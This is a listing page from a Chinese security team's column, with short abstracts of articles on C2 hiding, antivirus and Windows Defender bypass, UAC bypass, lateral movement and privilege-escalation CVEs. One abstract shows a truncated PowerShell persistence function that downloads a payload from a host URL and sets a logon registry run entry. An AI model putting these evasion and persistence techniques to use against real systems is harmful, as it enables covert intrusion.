首页
学习
活动
专区
工具
TVP
发布

黑白天安全团队

专栏作者
164
文章
395872
阅读量
38
订阅数
利用Domain Borrowing对抗流量检测设备
Domain Borrowing是腾讯安全玄武实验室的安全研究员 Tianze Ding 和 Junyu Zhou 在Black Hat Asia 2021演讲中分享介绍的一种使用 CDN 隐藏 C2 流量以规避审查的新方法。借用在某些 CDN 实现中发现的一些技巧,将它们链接在一起以“借用”域及其有效的 HTTPS 证书来隐藏我们的 C2 流量,特别是当我们的 C2 流量的 SNI 和 HOST 相同时。
黑白天安全
2023-09-20
2020
绕过杀软进行横向移动
wmi是基于135端口进行的横向。依赖445只是因为,需要使用445取回命令执行结果。sharpwmi进行横向的时候火绒日志有一个特别有趣的地方:
黑白天安全
2023-08-28
2930
终端安全系列-计划任务详解
任务计划程序服务(Task Scheduler service)是Windows操作系统中的一个核心服务,它负责管理和执行计划任务。任务计划程序服务(Task Scheduler service)在后台运行,并由 svchost.exe 进程来托管。任务计划程序服务允许用户创建、编辑和删除计划任务。用户可以通过图形用户界面(Task Scheduler GUI)、命令行工具(如schtasks)或编程接口来管理计划任务,用于在预定的时间或特定事件发生时自动执行一系列任务。
黑白天安全
2023-08-28
9830
RASP的安全攻防研究实践
随着Web应用攻击手段变得复杂,基于请求特征的防护手段,已经不能满足企业安全防护需求。在2012年的时候,Gartner引入了“Runtime application self-protection”一词,简称为RASP,属于一种新型应用安全保护技术,它将防护功能“ 注入”到应用程序中,与应用程序融为一体,使应用程序具备自我防护能力,当应用程序遭受到实际攻击伤害时,能实时检测和阻断安全攻击,而不需要进行人工干预。
黑白天安全
2023-01-31
2.2K0
域提权漏洞系列分析-Zerologon漏洞分析
本文是域提权漏洞系列分析中的Zerologon漏洞分析部分-其他部分还有几年的域提权漏洞和域提权手法
黑白天安全
2023-01-16
1.6K0
使用SharpWSUS通过WSUS横向移动
WSUS 是一种 Microsoft 解决方案,使管理员可以以扩展的方式在整个环境中部署 Microsoft 产品更新和补丁,使用内部服务器而不需要直接连接到Internet。WSUS服务在 Windows 企业环境中极为常见。
黑白天安全
2022-11-11
7540
Kaspersky AVP.exe DLL 劫持
Kaspersky AVP.exe 中的 DLL 注入允许本地管理员在不知道 Kaspersky 密码的情况下杀死或篡改防病毒软件和在高权限中执行命令。
黑白天安全
2022-11-11
6600
WMI持久性后门(powershell)(水文)
“WMI是微软为基于Web的企业管理(WBEM)规范提供的一个实现版本,而WBEM则是一项行业计划,旨在开发用于访问企业环境中管理信息的标准技术。WMI使用公共信息模型(CIM)行业标准来表示系统、应用程序、网络、设备和其他托管组件。”
黑白天安全
2022-11-11
1.2K0
beacon_frp
即不落地PE⽂件。落地的是⼀个经过aes加密(可以通过修改源代 码⾃定义aeskey,否则使⽤默认的aeskey)的数据⽂件。
黑白天安全
2022-11-11
1.1K0
Active Directory 域服务特权提升漏洞 CVE-2022–26923
经过身份验证的用户可以操纵他们拥有或管理的计算机帐户的属性,并从 Active Directory 证书服务获取允许提升权限的证书。
黑白天安全
2022-05-31
1.8K0
Protected Process Light (PPL) Attack
首先,PPL表示Protected Process Light,但在此之前,只有Protected Processes。受保护进程的概念是随Windows Vista / Server 2008引入的,其目的不是保护您的数据或凭据。其最初目标是保护媒体内容并遵守DRM(数字版权管理)要求。Microsoft 开发了这种机制,以便您的媒体播放器可以读取例如蓝光,同时防止您复制其内容。当时的要求是镜像文件(即可执行文件)必须使用特殊的 Windows Media 证书进行数字签名(如Windows Internals的“受保护的进程”部分中所述
黑白天安全
2022-05-31
1.6K0
Certified Pre-Owned
Certified Pre-Owned是安全研究员@(Will Schroeder和Lee Christensen)在6月17号提出的针对Active Directory 证书服务的一个攻击手法,并于8月5日在Black Hat 2021中进行展示。
黑白天安全
2022-04-12
1.7K0
利用本地RPC接口的UAC Bypass
AppInfo是一个本地RPC服务,其接口ID为201ef99a-7fa0-444c-9399-19ba84f12a1a,AppInfo 是 UAC 提升的关键。ShellExecuteEx()通过 RPC 调用将所有提升请求转发到 AppInfo NT 服务。AppInfo 在系统上下文中调用一个名为“approve.exe”的可执行文件,这是启动用户同意的对话框的可执行文件.
黑白天安全
2022-04-12
1.1K0
CVE-2021-4034 Linux Polkit 权限提升漏洞分析
2022-01-25,CVE-2021-4034 Exploit 详情发布,此漏洞是由Qualys研究团队在polkit的pkexec中发现的一个内存损坏漏洞
黑白天安全
2022-02-24
2.3K1
JavaWeb 内存马技术归纳
本文以Tomcat 9为核心学习并归纳了一些内存马技术,除有特殊说明外的章节外,本文使用Java 8u292
黑白天安全
2022-02-24
1.9K0
从工具OneForAll代码角度学习子域名挖掘
self.data = wildcard.deal_wildcard(self.data)
黑白天安全
2022-02-23
1.9K0
colorcpl.exe
产品名称: Microsoft® Windows® Operating System
黑白天安全
2022-02-23
8440
分享一个维权手法
#> #使用Unicorn生成已编码的powershell命令。修改注册表,当用户登录时执行payload function Add-Persistence() { #payload的路径 $payloadurl = "http://192.168.125.106:8000/ghu98hjbs7jhj2" #保存维权马的路径 $tmpdir = $env:APPDATA; #vbs路径 $payloadvbsloaderpath = "$tmpdir\_log.vbs" #下载payloa
黑白天安全
2021-12-29
4590
Alternative Process Injection
2 .WriteProcessMemory -> 将解密/解码的shellcode写入内存空间
黑白天安全
2021-12-29
8920
绕过ppl保护关闭Windows Defender
可以关闭Windows Defender服务并通过提升权限删除ppl保护,然后删除Windows Defender中的DLL和其他文件,使Windows Defender服务无法运行,从而导致Windows Defender拒绝服务。
黑白天安全
2021-12-13
2.3K0
点击加载更多
社区活动
腾讯技术创作狂欢月
“码”上创作 21 天,分 10000 元奖品池!
Python精品学习库
代码在线跑,知识轻松学
博客搬家 | 分享价值百万资源包
自行/邀约他人一键搬运博客,速成社区影响力并领取好礼
技术创作特训营·精选知识专栏
往期视频·千货材料·成员作品 最新动态
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档